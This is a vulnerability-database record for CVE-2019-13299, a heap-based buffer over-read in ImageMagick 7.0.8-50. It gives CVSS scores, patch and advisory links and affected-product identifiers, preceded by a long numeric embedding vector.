-0.018874462693929672, -0.01000689622014761, -0.0030799689702689648, -0.026451701298356056, 0.0028895086143165827, -0.0015090990345925093, -0.02013733610510826, 0.004200425930321217, -0.004677434917539358, 0.003809209680184722, -0.008256719447672367, -0.005377505905926228, -0.0401374027132988, -0.007790005300194025, -0.001598323811776936, -0.005377505905926228, -0.00023571628844365478, -0.022347362712025642, 0.00855184718966484, 0.006781079340726137, 0.045545794069767, -0.005933444481343031, 0.007481150329113007, 0.004708320368081331, -0.006434475537389517, -0.0012474303366616368, -0.016842883080244064, 0.008291036821901798, -0.030418770387768745, 0.007144841831177473, -0.03055603802204132, -0.013816106133162975, 0.023527875542640686, -0.016238901764154434, -0.02443384937942028, -0.003850390203297138, -0.004704888444393873, 0.001137615297921002, 0.018407749012112617, -0.009499002248048782, -0.02238854393362999, 0.0010097837075591087, 0.0184214748442173, -0.012285559438169003, -0.01703505963087082, -0.01875092089176178, 0.001139331143349409, 0.02205909788608551, 0.021647293120622635, 0.04455745592713356, -0.01984907127916813, -0.000023298163796425797, 0.013994555920362473, -0.0038332317490130663, -0.00685314554721117, -0.029320620000362396, 0.0065545858815312386, 0.025957532227039337, 0.021413935348391533, -0.0027934203390032053, -0.016691887751221657, 0.0033081783913075924, 0.009519591927528381, -0.016362443566322327, 0.005367210600525141, 0.001662668539211154, 0.031983632594347, -0.010315751656889915, 0.02350042201578617, -0.016334988176822662, 0.017446866258978844, -0.0026372771244496107, -0.0011050140019506216, 0.00497599458321929, -0.01522311195731163, 0.011262906715273857, -0.0075909653678536415, 0.0019526488613337278, 0.0235553290694952, 0.012361057102680206, -0.005895695649087429, 0.003457458224147558, 0.017227236181497574, -0.007220339495688677, -0.012512052431702614, -0.019505899399518967, -0.01725468970835209, -0.0230474341660738, 0.008043952286243439, 0.028798997402191162, 0.0033116100821644068, -0.010281434282660484, -0.008050816133618355, 0.001017505070194602, 0.01004121359437704, 0.0024639752227813005, -0.005470162257552147, -0.008071406744420528, 0.0034042666666209698, 0.006427612155675888, -0.011818844825029373, 0.029512794688344002, 0.009890218265354633, 0.002347296802327037, 0.0022323341108858585, 0.011310950852930546, -0.000036837373045273125, 0.011043276637792587, -0.00019099668134003878, -0.005209351424127817, 0.006568312644958496, -0.006750193890184164, -0.0052368054166436195, 0.003840095130726695, -0.006956097204238176, -0.00827731005847454, 0.0035792842973023653, 0.005586840678006411, 0.005603999365121126, 0.014070053584873676, 0.022265002131462097, 0.012017885223031044, 0.008572437800467014, 0.016293808817863464, 0.029155896976590157, 0.009656861424446106, 0.0260261669754982, -0.03571734577417374, 0.003819504752755165, -0.03947851061820984, -0.017529228702187538, 0.0067090135999023914, -0.008208675310015678, -0.014289683662354946, -0.0038641171995550394, 0.028414644300937653, -0.0004744353354908526, -0.007096797693520784, -0.008750886656343937, 0.02536727674305439, 0.010144165717065334, -0.0033322004601359367, 0.020535415038466454, -0.008421441540122032, -0.003395687323063612, 0.01924508810043335, -0.007426242809742689, -0.004680866841226816, 0.00984903797507286, 0.011722756549715996, -0.0013375129783526063, 0.002568642608821392, -0.017021333798766136, -0.0117776645347476, -0.031571827828884125, 0.00047829601680859923, 0.007011004723608494, -0.006479088217020035, 0.003949910402297974, 0.02652033604681492, -0.0005735262529924512, -0.009993169456720352, -0.004849020857363939, 0.010981505736708641, 0.0018496973207220435, -0.008627344854176044, -0.008490076288580894, 0.01343175396323204, -0.004028839524835348, -0.0019200475653633475, 0.032834701240062714, 0.00528141763061285, -0.014591675251722336, 0.004557324573397636, -0.007632146123796701, 0.0117776645347476, -0.002630413742735982, 0.026657603681087494, -0.002740228781476617, 0.018654832616448402, -0.017556682229042053, 0.0012105393689125776, -0.0002219894086010754, -0.007790005300194025, -0.001925195101648569, -0.011283496394753456, -0.003908729646354914, -0.014536767266690731, -0.010693240910768509, -0.0035003547091037035, -0.001834254595451057, -0.0034385838080197573, 0.005912854336202145, -0.024529937654733658, -0.006997277960181236, 0.0012560096802189946, 0.009396050125360489, 0.003081684932112694, -0.008544983342289925, 0.008723433129489422, -0.013864150270819664, -0.0024759862571954727, -0.019011730328202248, -0.0034643218386918306, 0.019547078758478165, 0.0020212833769619465, -0.002498292364180088, -0.018998004496097565, 0.014523040503263474, 0.0029066670686006546, 0.02509273961186409, 0.00984903797507286, 0.00021008563635405153, -0.0072683836333453655, 0.014097507111728191, -0.007337018381804228, 0.018668558448553085, -0.006835986860096455, -0.02712431736290455, -0.010885417461395264, 0.024626025930047035, 0.014632855542004108, 0.011564897373318672, -0.001875435234978795, -0.0014112950302660465, -0.007343881763517857, 0.0008364818640984595, -0.004076883662492037, 0.006688422989100218, -0.0021636998280882835, 0.010295161046087742, 0.03376812860369682, -0.013836696743965149, -0.02580653689801693, -0.00841457862406969, 0.007474286947399378, 0.01207965612411499, 0.0178724005818367, 0.009450958110392094, 0.01356902252882719, -0.0024313738103955984, -0.00929309893399477, 0.0006597482715733349, 0.016458531841635704, 0.0024639752227813005, -0.009135239757597446, -0.018105756491422653, 0.0015708700520917773, 0.006163369864225388, 0.007165431976318359, 0.01719978265464306, -0.04362402856349945, -0.009759812615811825, 0.024790748953819275, 0.012168880552053452, -0.011256042867898941, 0.00019271255587227643, -0.018572470173239708, -0.001854844857007265, -0.001008925843052566, 0.011310950852930546, -0.017899854108691216, -0.019437264651060104, 0.003788619302213192, 0.006256026215851307, 0.01025398075580597, -0.006880599539726973, 0.00025823694886639714, -0.004766659811139107, -0.013061127625405788, 0.016417350620031357, -0.01880582794547081, 0.0073095643892884254, -0.015909455716609955, -0.011873752810060978, 0.023843593895435333, -0.03514081612229347, -0.019945159554481506, -0.02443384937942028, 0.0038881392683833838, 0.022566992789506912, 0.007838048972189426, -0.0002062249550363049, -0.02487310953438282, -0.004601937253028154, -0.018064575269818306, 0.02030205726623535, 0.0024948606733232737, -0.007645872887223959, -0.007488013710826635, -0.009855900891125202, 0.001935490290634334, 0.01353470515459776, -0.013143489137291908, 0.0034042666666209698, 0.028304830193519592, -0.012772863730788231, -0.019396083429455757, 0.007426242809742689, -0.03656841441988945, -0.009979442693293095, 0.002256356179714203, 0.004420056007802486, -0.014468133449554443, -0.005295144394040108, 0.017515501007437706, -0.025381004437804222, -0.004553893115371466, -0.010075530968606472, 0.01997261308133602, -0.0007931563886813819, 0.022127732634544373, 0.004828430712223053, 0.012889541685581207, -0.0030782532412558794, 0.013555295765399933, -0.017941033467650414, -0.011866888962686062, -0.014138688333332539, -0.019986338913440704, 0.02090604044497013, -0.00012300572416279465, -0.003042220138013363, -0.003997954074293375, 0.024461302906274796, -0.01196297723799944, 0.006908053066581488, -0.004399465397000313, 0.0018016531830653548, -0.012024748139083385, 0.009416640736162663, 0.03039131499826908, -0.012882678769528866, 0.0032000793144106865, 0.01048047374933958, -0.006465361453592777, 0.0035209450870752335, -0.027838116511702538, -0.009574499912559986, 0.012477735057473183, -0.029265711084008217, -0.03033640794456005, 0.0025652109179645777, 0.012978766113519669, -0.012539505958557129, -0.009245054796338081, -0.01135899405926466, 0.007206612732261419, 0.01847638189792633, -0.0020641798619180918, 0.021043309941887856, -0.00032987413578666747, 0.0006648958078585565, 0.006173665169626474, 0.03187381848692894, 0.014934847131371498, -0.013253304176032543, -0.014591675251722336, 0.004070020280778408, -0.013143489137291908, 0.010384385474026203, -0.00843516830354929, -0.00528141763061285, -0.011310950852930546, 0.003891570959240198, -0.01719978265464306, -0.01737823151051998, 0.009862764738500118, 0.013644520193338394, -0.023349424824118614, -0.009238190948963165, -0.002789988648146391, -0.005974625237286091, 0.015099570155143738, -0.016197720542550087, -0.0001839187607401982, 0.032120902091264725, -0.0012500041630119085, -0.009011697955429554, 0.010267707519233227, 0.004152381792664528, 0.010686377063393593, -0.0010912871221080422, -0.023802412673830986, 0.012470872141420841, -0.028606820851564407, 0.010604016482830048, 0.0027985679917037487, 0.011578625068068504, 0.0046328227035701275, 0.030199140310287476, -0.007920410484075546, -0.00849694013595581, -0.00863420870155096, -0.018009668216109276, 0.010521654970943928, 0.02415931224822998, -0.021661018952727318, -0.013658246956765652, 0.004859316162765026, -0.017803765833377838, 0.016719341278076172, -0.01142076589167118, -0.005302008241415024, -0.018901916220784187, -0.001269736560061574, 0.01621144637465477, -0.018146937713027, 0.017186054959893227, -0.0036341918166726828, -0.01968434825539589, -0.0005782449152320623, -0.0012165448861196637, -0.0054873209446668625, -0.01169530302286148, -0.030199140310287476, -0.02420049160718918, 0.021043309941887856, 0.010356931947171688, 0.02238854393362999, 0.01660952717065811, -0.006317797116935253, 0.026726238429546356, -0.01492112036794424, 0.007714507635682821, 0.0018222435610368848, -0.005957466550171375, -0.003074821550399065, 0.0005636600544676185, 0.00863420870155096, 0.0071997493505477905, -0.00471518374979496, -0.01541528757661581, 0.004464668221771717, -0.010988368652760983, -0.01693897135555744, -0.01527801901102066, -0.010411839932203293, -0.00816063117235899, 0.029238257557153702, -0.03297197073698044, -0.02019224315881729, -0.01048047374933958, -0.0020315784495323896, 0.0004246754106134176, 0.027426309883594513, -0.03538789972662926, 0.0002910527982749045, -0.02619088999927044, -0.0010355216218158603, 0.02096094749867916, -0.0015090990345925093, 0.009251918643712997, -0.004708320368081331, -0.014049462974071503, -0.01295817643404007, 0.00978726614266634, -0.04192189499735832, -0.00020311494881752878, 0.007577238604426384, 0.0009008265915326774, 0.008057679049670696, 0.012464008294045925, -0.00956763606518507, -0.016417350620031357, 0.005497616250067949, -0.006334955804049969, -0.019643167033791542, 0.0033819605596363544, 0.012258104979991913, -0.02712431736290455, 0.0015794492792338133, 0.015799641609191895, -0.0037474387791007757, 0.01130408700555563, -0.0028346010949462652, 0.008798930794000626, 0.0075635118409991264, -0.004742637742310762, -0.010329478420317173, -0.005494184326380491, -0.01138644851744175, -0.014152415096759796, 0.002057316480204463, 0.03066585399210453, -0.009684314951300621, -0.000012694684301095549, -0.003939615096896887, 0.02028833143413067, -0.011571761220693588, 0.025504546239972115, 0.01321212388575077, 0.014536767266690731, -0.0031022753100842237, -0.0023524442221969366, -0.03788619488477707, 0.003152035176753998, -0.004464668221771717, -0.003023345721885562, 0.008798930794000626, -0.02912844344973564, -0.006842850707471371, -0.013596476055681705, -0.004958835896104574, -0.021249212324619293, 0.016005543991923332, 0.005974625237286091, 0.0011633532121777534, 0.008647935464978218, 0.020535415038466454, 0.023418059572577477, 0.010199072770774364, 0.0021293824538588524, -0.01610163226723671, 0.00018456221732776612, 0.017337052151560783, -0.005693224258720875, -0.009711768478155136, -0.004742637742310762, -0.004001385997980833, 0.01725468970835209, -0.00014499019016511738, 0.0028963719960302114, -0.014083780348300934, 0.004221016075462103, 0.012210060842335224, 0.012505189515650272, 0.002489713253453374, -0.0026544358115643263, -0.02553199976682663, 0.006564881186932325, -0.02359651029109955, -0.009183283895254135, 0.006636947393417358, -0.009169557131826878, -0.0018617083551362157, -0.009553909301757812, -0.009629407897591591, -0.006029532756656408, 0.005840788129717112, -0.00008230766979977489, 0.009382323361933231, 0.0007622708799317479, -0.019107818603515625, 0.009464684873819351, -0.005507911089807749, 0.009059742093086243, -0.009011697955429554, -0.004221016075462103, -0.004025408066809177, 0.021153124049305916, 0.007295837625861168, -0.014399498701095581, -0.0014541915152221918, 0.022319909185171127, 0.02001379244029522, -0.008393988013267517, 0.0040974742732942104, -0.007254656869918108, -0.009862764738500118, 0.01100209541618824, -0.005350051913410425, 0.01588200218975544, -0.0015708700520917773, 0.003112570382654667, 0.014372045174241066, 0.02525746263563633, 0.014536767266690731, 0.02317097596824169, -0.01732332445681095, -0.02271798811852932, 0.010878553614020348, -0.0035312403924763203, 0.00821553822606802, 0.00414894986897707, 0.010844236239790916, 0.006750193890184164, 0.014619128778576851, 0.010686377063393593, 0.014221048913896084, -0.004763227887451649, -0.0009625975508242846, -0.008194948546588421, -0.003304746700450778, -0.011667849496006966, 0.001794789801351726, -0.009409776888787746, 0.010432429611682892, 0.01012357510626316, -0.0007622708799317479, -0.00253089377656579, 0.0067330352030694485, 0.010597152635455132, 0.0018188117537647486, 0.00028762107831425965, -0.011503126472234726, -0.01483875885605812, -0.019327448680996895, 0.008263582363724709, 0.00431710435077548, 0.00849694013595581, 0.0026870369911193848, 0.013637657277286053, 0.01072755828499794, -0.006012374069541693, -0.013781788758933544, 0.00849694013595581, 0.0032893039751797915, 0.0390392504632473, -0.002035010140389204, -0.0019114682218059897, 0.0031914999708533287, 0.01160607859492302, -0.005792743992060423, -0.02189437672495842, -0.0073781986720860004, -0.01880582794547081, 0.017131147906184196, 0.019766708835959435, -0.009203874506056309, -0.012999356724321842, 0.009725495241582394, -0.011681576259434223, -0.01034320518374443, 0.016911517828702927, -0.007783141918480396, 0.00873715989291668, -0.0012036759871989489, 0.01643107645213604, 0.02348669432103634, 0.000009531067007628735, 0.011976704001426697, -0.0031588985584676266, -0.0008334791054949164, 0.012889541685581207, 0.01122172549366951, -0.01100209541618824, -0.0022460611071437597, 0.0017587566981092095, 0.008661662228405476, -0.022402271628379822, 0.012258104979991913, -0.012189471162855625, -0.01719978265464306, -0.011400175280869007, -0.028195014223456383, -0.0043754433281719685, 0.0032995992805808783, -0.021208032965660095, 0.027330221608281136, -0.0010604015551507473, 0.011331540532410145, 0.02631443180143833, 0.01692524552345276, 0.00014456122880801558, 0.002789988648146391, -0.0014293115818873048, -0.0031365924514830112, -0.009272508323192596, -0.00986962765455246, -0.010761874727904797, -0.012896405532956123, 0.00297015393152833, -0.011427628807723522, -0.005205919966101646, 0.021029582247138023, 0.01500348187983036, 0.016293808817863464, -0.01725468970835209, 0.015854548662900925, -0.008188084699213505, 0.006468792911618948, -0.010830509476363659, 0.00532259838655591, -0.001108445692807436, 0.003963637165725231, 0.0010509643470868468, 0.001914900029078126, 0.0373920239508152, -0.015250565484166145, -0.025394730269908905, 0.009780403226613998, 0.0067330352030694485, -0.0012337034568190575, 0.01699388027191162, -0.00794100109487772, 0.012615004554390907, 0.010027486830949783, 0.005384369287639856, -0.006616356782615185, -0.0037954826839268208, -0.016142813488841057, 0.00921073742210865, -0.015689825639128685, 0.0010904291411861777, 0.0013383709592744708, -0.039725594222545624, -0.014124961569905281, 0.008002771995961666, -0.009924535639584064, 0.008757750503718853, -0.00959509052336216, -0.0008510666666552424, -0.021523749455809593, 0.001143620815128088, -0.007110524456948042, 0.02398086152970791, 0.004337694495916367, -0.025737902149558067, -0.009752949699759483, -0.007790005300194025, 0.017337052151560783, -0.004063156899064779, 0.0019372061360627413, 0.01698015257716179, 0.024749567732214928, 0.010418702848255634, 0.0017210077494382858, -0.009780403226613998, -0.01004121359437704, 0.007851776666939259, 0.00039872300112619996, -0.014811305329203606, -0.02028833143413067, -0.018284207209944725, -0.015127023681998253, 0.01166098564863205, -0.003150319214910269, 0.014687763527035713, -0.008393988013267517, -0.00986962765455246, 0.00843516830354929, -0.007508604321628809, -0.016060451045632362, 0.014358318410813808, -0.022786622866988182, -0.006942370440810919, 0.015113296918570995, -0.00610846234485507, -0.009224464185535908, -0.005535365082323551, -0.00871657021343708, 0.007076207548379898, -0.02205909788608551, 0.025545727461576462, -0.01191493310034275, -0.02050796151161194, 0.006575176492333412, 0.02361023612320423, 0.020494233816862106, -0.0007524046814069152, 0.007645872887223959, 0.006252594757825136, -0.01666443422436714, 0.0019921136554330587, -0.014481860212981701, -0.0014876507921144366, -0.003558694152161479, -0.017227236181497574, 0.00824299268424511, 0.018764646723866463, -0.014207322150468826, -0.00841457862406969, 0.00200584065169096, 0.008915609680116177, -0.012807180173695087, 0.008606755174696445, 0.0020727592054754496, 0.010823646560311317, -0.025408457964658737, 0.011928659863770008, -0.014550494030117989, 0.0016738215927034616, 0.0004993153270334005, 0.014811305329203606, 0.014825032092630863, 0.014962300658226013, -0.0016558050410822034, -0.013239577412605286, 0.005264258943498135, 0.005779017228633165, 0.014097507111728191, 0.029595157131552696, -0.019601987674832344, -0.0022237547673285007, 0.010096121579408646, 0.01188061572611332, 0.021427663043141365, 0.024749567732214928, -0.011105047538876534, -0.0049107917584478855, 0.02178456075489521, 0.016527164727449417, 0.0004079457721672952, 0.005116695072501898, 0.0003155037993565202, -0.01813321001827717, 0.019217634573578835, 0.02068641036748886, 0.013617066666483879, -0.015895728021860123, -0.004886769689619541, 0.005202488042414188, 0.008064542897045612, -0.0053466204553842545, 0.022814076393842697, 0.0058099026791751385, -0.013898467645049095, -0.030858030542731285, 0.0048421574756503105, -0.004361716564744711, 0.005916285794228315, -0.01708996668457985, -0.02271798811852932, -0.008387125097215176, -0.0005778159247711301, -0.0027556715067476034, -0.03467410430312157, 0.030638400465250015, 0.008723433129489422, -0.005137285217642784, 0.015168203972280025, 0.002487997291609645, 0.019711801782250404, 0.0178724005818367, 0.009464684873819351, -0.027989111840724945, -0.016032997518777847, -0.028551913797855377, 0.006911484990268946, 0.019533352926373482, 0.01990397833287716, 0.005181897897273302, 0.0026836053002625704, -0.0031914999708533287, -0.008572437800467014, -0.01969807595014572, -0.02050796151161194, 0.01387101411819458, 0.0032772929407656193, 0.009087195619940758, -0.003033640794456005, 0.016170267015695572, -0.018050849437713623, -0.005247100722044706, 0.013116035610437393, 0.015634918585419655, -0.005748131778091192, -0.014756397344172001, 0.013699428178369999, 0.01665070652961731, 0.0057687219232320786, -0.007179159205406904, -0.016582073643803596, -0.005964329931885004, 0.029979510232806206, 0.01692524552345276, 0.008785204030573368, -0.006829123478382826, -0.002537757158279419, 0.0013598192017525434, -0.007302701007574797, -0.005202488042414188, -0.008970516733825207, 0.02620461769402027, 0.012923859059810638, -0.004667139612138271, 0.005315735004842281, -0.01492112036794424, 0.025710448622703552, 0.0037543021608144045, 0.015319200232625008, -0.017666496336460114, -0.024351488798856735, -0.016527164727449417, 0.003234396455809474, -0.0014078633394092321, 0.004886769689619541, 0.012546369805932045, 0.016403622925281525, -0.027096863836050034, 0.008071406744420528, 0.01091973390430212, 0.015621190890669823, -0.014179868623614311, -0.025394730269908905, 0.0059471712447702885, -0.015621190890669823, -0.01146881002932787, 0.007748824544250965, -0.011407038196921349, -0.006060418207198381, -0.010501064360141754, 0.00995198916643858, 0.009423504583537579, -0.01947844587266445, 0.002369602909311652, 0.014481860212981701, 0.022210095077753067, 0.009389187209308147, 0.027206679806113243, -0.0046328227035701275, 0.009025424718856812, 0.0006078434525988996, 0.0032824405934661627, -0.0020710432436317205, -0.02194928377866745, -0.0034197093918919563, 0.02019224315881729, 0.021139398217201233, -0.0022254707291722298, -0.009368596598505974, 0.010514791123569012, -0.01207965612411499, 0.0012731682509183884, 0.0071311150677502155, 0.006774215959012508, -0.0010955767938867211, -0.003445447189733386, 0.01091973390430212, -0.00489363307133317, -0.021482570096850395, -0.009601953439414501, -0.009176420047879219, 0.007350745145231485, 0.012361057102680206, -0.026945868507027626, 0.036870405077934265, 0.024392668157815933, -0.019986338913440704, 0.01919018104672432, 0.011036412790417671, 0.001335797132924199, 0.006660969462245703, -0.0068085333332419395, -0.02361023612320423, -0.0016094768652692437, 0.01227183174341917, -0.010706967674195766, -0.04164735972881317, 0.028716636821627617, -0.011324677616357803, 0.01577218621969223, -0.0013520978391170502, 0.01470149029046297, -0.010487337596714497, -0.00851752981543541, -0.007021300029009581, 0.010693240910768509, 0.01317780651152134, 0.010164755396544933, -0.0019166158745065331, -0.014454406686127186, 0.01687033660709858, 0.0417022667825222, 0.005775585304945707, -0.017831219360232353, 0.0017896421486511827, -0.0015417004469782114, 0.016252627596259117, -0.0230474341660738, 0.013356255367398262, 0.019945159554481506, 0.001565722399391234, -0.010384385474026203, -0.024186765775084496, 0.013006220571696758, 0.005765290465205908, 0.009725495241582394, 0.0017862104577943683, 0.01094718836247921, 0.004083747044205666, -0.0029615748208016157, -0.00685314554721117, -0.007556648459285498, -0.003124581417068839, -0.007158568594604731, 0.004670571535825729, 0.00027367970324121416, -0.0024142153561115265, -0.007584101986140013, -0.006959529127925634, -0.0058099026791751385, 0.011036412790417671, -0.032505255192518234, 0.02172965370118618, -0.010583425872027874, 0.011413902044296265, -0.007024731487035751, -0.024694660678505898, -0.02063150331377983, -0.009656861424446106, -0.011050139553844929, 0.003486627945676446, -0.019272541627287865, 0.009032287634909153, 0.004320535808801651, -0.0028466121293604374, -0.013802379369735718, 0.0004885912057943642, -0.008373397402465343, 0.016238901764154434, 0.01168844010680914, 0.016307534649968147, -0.005672633647918701, 0.0012379931285977364, -0.02470838651061058, 0.013376845978200436, 0.011400175280869007, 0.004553893115371466, -0.009217601269483566, -0.002208312042057514, 0.02454366348683834, -0.013960238546133041, 0.012127700261771679, 0.013575885444879532, -0.008325353264808655, 0.02642424777150154, 0.018929369747638702, -0.013644520193338394, -0.008387125097215176, -0.006959529127925634, 0.012210060842335224, 0.005068650934845209, 0.003433436155319214, 0.007192885968834162, 0.004862747620791197, 0.0009231328149326146, 0.01113936398178339, -0.007947864010930061, -0.0021894376259297132, 0.010377522557973862, 0.004605368711054325, 0.016911517828702927, -0.004986289888620377, -0.009354869835078716, 0.00445437291637063, 0.005923149641603231, -0.00628691166639328, 0.013665110804140568, -0.0002275659644510597, -0.0025137350894510746, 0.021715926006436348, 0.012113972567021847, -0.019217634573578835, -0.0033733812160789967, -0.02310234121978283, -0.001385557116009295, 0.019492171704769135, 0.0003590437409002334, -0.0026046757120639086, 0.027316493913531303, 0.008483212441205978, -0.016403622925281525, 0.0015803072601556778, 0.01514075044542551, 0.013376845978200436, -0.0052779861725866795, -0.0075223310850560665, 0.002640708815306425, 0.0009317121002823114, -0.0050240387208759785, 0.0034505948424339294, -0.02531236968934536, 0.01356902252882719, -0.01514075044542551, -0.004485258366912603, 0.009533319622278214, -0.008304763585329056, -0.00021512596867978573, -0.010411839932203293, -0.026328159496188164, -0.006561449263244867, -0.008352807722985744, 0.018078302964568138, 0.01070010382682085, 0.0018617083551362157, -0.0014233060646802187, -0.00728211086243391, 0.001253435853868723, 0.0005469304160214961, -0.004114632960408926, 0.0019629441667348146, -0.015127023681998253, -0.015785913914442062, 0.013939647935330868, -0.003246407490223646, -0.02079622633755207, 0.04603996127843857, 0.01166098564863205, 0.007295837625861168, 0.008544983342289925, -0.0025652109179645777, 0.014605402015149593, 0.0077762785367667675, 0.0012062496971338987, -0.007137978449463844, 0.023733777925372124, -0.009107786230742931, 0.005727541167289019, 0.032120902091264725, -0.02978733368217945, -0.012278695590794086, -0.006053554825484753, 0.002518882742151618, 0.01142076589167118, -0.0211256705224514, -0.00846262276172638, -0.011187408119440079, -0.0016446519875898957, 0.018462656065821648, -0.01470149029046297, -0.021468842402100563, 0.025271188467741013, 0.008016498759388924, -0.019052911549806595, 0.020480507984757423, -0.008256719447672367, 0.010082394815981388, -0.002882645232602954, -0.0016257775714620948, 0.0017072808695957065, 0.005960898473858833, 0.005538796540349722, -0.007529194466769695, 0.010789329186081886, 0.0033991190139204264, -0.010741285048425198, -0.01287581492215395, 0.02266308106482029, -0.012017885223031044, 0.015470195561647415, 0.022429725155234337, 0.007213476113975048, -0.014591675251722336, -0.010761874727904797, -0.0016515154857188463, 0.0002758245391305536, -0.010851100087165833, 0.007405652664601803, 0.019533352926373482, 0.01704878732562065, 0.03662332147359848, -0.015456468798220158, 0.00296500651165843, -0.020549140870571136, 0.010384385474026203, -0.029320620000362396, -0.005782448686659336, -0.01758413575589657, -0.010878553614020348, 0.003946478478610516, -0.011125637218356133, -0.01378865260630846, 0.025106467306613922, 0.021386481821537018, -0.013109171763062477, 0.005562818609178066, 0.01621144637465477, -0.022965073585510254, -0.005607431288808584, 0.015332926996052265, -0.016334988176822662, -0.02079622633755207, 0.005463298875838518, -0.008140040561556816, -0.0040974742732942104, -0.008428305387496948, -0.020425599068403244, -0.017941033467650414, -0.0005597993731498718, 0.002367887180298567, -0.008352807722985744, -0.009608817286789417, -0.029430434107780457, -0.009100922383368015, -0.006928643677383661, 0.03371322154998779, 0.01660952717065811, 0.024255400523543358, -0.013747472316026688, -0.013761199079453945, -0.008895019069314003, -0.014577948488295078, -0.00015603603969793767, -0.0012482883175835013, 0.005473594181239605, -0.0022632195614278316, -0.011118774302303791, 0.015758460387587547, -0.0036719408817589283, 0.018270479515194893, 0.008387125097215176, -0.016582073643803596, 0.02002752013504505, -0.0045882100239396095, -0.014852485619485378, -0.001391562633216381, 0.011077593080699444, -0.00397050054743886, -0.007844912819564342, -0.00013330088404472917, 0.011324677616357803, -0.007927274331450462, 0.010308887809515, 0.013919058255851269, -0.007011004723608494, 0.006520268972963095, -0.011770800687372684, -0.003846958512440324, 0.03121492825448513, 0.00373028009198606, 0.002862054854631424, -0.004790681879967451, 0.01249146182090044, 0.01853129081428051, -0.0046602762304246426, -0.003991090692579746, 0.0039018660318106413, -0.01769394986331463, 0.0027762618847191334, 0.005562818609178066, 0.0034128460101783276, 0.00331675773486495, -0.03214835748076439, 0.004406328778713942, 0.021098216995596886, -0.007796868681907654, -0.027494944632053375, 0.04521634802222252, -0.0041249278001487255, 0.004550461191684008, 0.007748824544250965, -0.0028174424078315496, -0.007316427771002054, -0.017611589282751083, -0.008407714776694775, -0.018874462693929672, 0.019121546298265457, 0.0033716652542352676, 0.01831166073679924, 0.00043904571793973446, 0.0010046361712738872, 0.009739222936332226, 0.01091973390430212, 0.009018560871481895, -0.010631470009684563, -0.003991090692579746, -0.0055559552274644375, -0.007954727858304977, 0.0017673360416665673, 0.00895678997039795, -0.006393295247107744, 0.029073534533381462, -0.004018544685095549, -0.01825675182044506, 0.010960915125906467, 0.019450990483164787, 0.009464684873819351, 0.01798221468925476, -0.0026184027083218098, -0.0018617083551362157, -0.005658906884491444, 0.013369983062148094, -0.00023550180776510388, -0.015305472537875175, 0.00567949702963233, 0.0016292092623189092, 0.02779693529009819, -0.0017930739559233189, -0.01864110492169857, 0.0017561828717589378, 0.008531256578862667, -0.00014134398952592164, -0.006081008352339268, -0.01665070652961731, 0.010871689766645432, -0.004965699277818203, 0.009052878245711327, -0.01492112036794424, 0.02476329356431961, 0.0005846793646924198, -0.0035827159881591797, 0.03181891143321991, 0.021359028294682503, 0.022319909185171127, 0.011578625068068504, -0.01169530302286148, 0.012477735057473183, -0.01820184476673603, -0.005816766060888767, 0.019039183855056763 ]
1,724
CVE-2019-13299
2019-07-05T01:15:10.187000
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/pixel-accessor.h in GetPixelChannel.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "[email protected]", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/8187d2d8fd010d2d6b1a3a8edd935beec404dddc" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1610" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1610
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
